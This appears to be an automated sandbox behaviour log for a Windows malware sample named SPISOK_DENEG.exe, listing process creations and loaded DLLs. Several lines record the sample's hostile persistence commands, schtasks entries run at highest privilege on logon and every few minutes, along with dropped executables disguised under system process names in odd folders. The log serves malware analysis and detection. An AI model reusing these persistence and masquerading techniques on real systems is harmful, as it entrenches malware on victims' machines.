Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZ" /sc ONLOGON /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 8 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 14 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChainPortsurrogate" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 10 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\ProviderserverruntimeperfSvc\ctfmon.exe C:\ProviderserverruntimeperfSvc\ctfmon.exe
Source: unknown | Process created: C:\Users\Default\Documents\dllhost.exe "C:\Users\Default User\Documents\dllhost.exe"
Source: unknown | Process created: C:\Users\Default\Documents\dllhost.exe "C:\Users\Default User\Documents\dllhost.exe"
Source: unknown | Process created: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
Source: unknown | Process created: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
Source: unknown | Process created: C:\Program Files (x86)\jDownloader\config\explorer.exe "C:\Program Files (x86)\jdownloader\config\explorer.exe"
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat"
Source: unknown | Process created: C:\Program Files (x86)\jDownloader\config\explorer.exe "C:\Program Files (x86)\jdownloader\config\explorer.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown | Process created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
Source: unknown | Process created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: mscoree.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: apphelp.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: kernel.appcore.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: version.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: uxtheme.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: windows.storage.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: wldp.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: profapi.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: cryptsp.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: rsaenh.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: cryptbase.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: sspicli.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: ktmw32.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: ntmarta.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: wbemcomn.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: amsi.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: userenv.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: propsys.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: dlnashext.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: wpdshext.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: edputil.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: urlmon.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: iertutil.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: srvcli.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: netutils.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: wintypes.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: appresolver.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: bcp47langs.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: slc.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: sppc.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: mscoree.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: apphelp.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: kernel.appcore.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: version.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: uxtheme.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: windows.storage.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: wldp.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: profapi.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: cryptsp.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: rsaenh.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: cryptbase.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: mscoree.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: kernel.appcore.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: version.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: uxtheme.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: windows.storage.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: wldp.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: profapi.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: cryptsp.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: rsaenh.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: cryptbase.dll
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Section loaded: sspicli.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: mscoree.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: apphelp.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: version.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: uxtheme.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: windows.storage.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: wldp.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: profapi.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: cryptsp.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: rsaenh.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: cryptbase.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: sspicli.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: mscoree.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: version.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: uxtheme.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: windows.storage.dll
Source: C:\Users\Default\Documents\dllhost.exe | Section loaded: wldp.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: profapi.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: sspicli.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: mscoree.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: apphelp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: version.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: wldp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: profapi.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: sspicli.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: mscoree.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: version.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: wldp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: profapi.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: rsaenh.dll
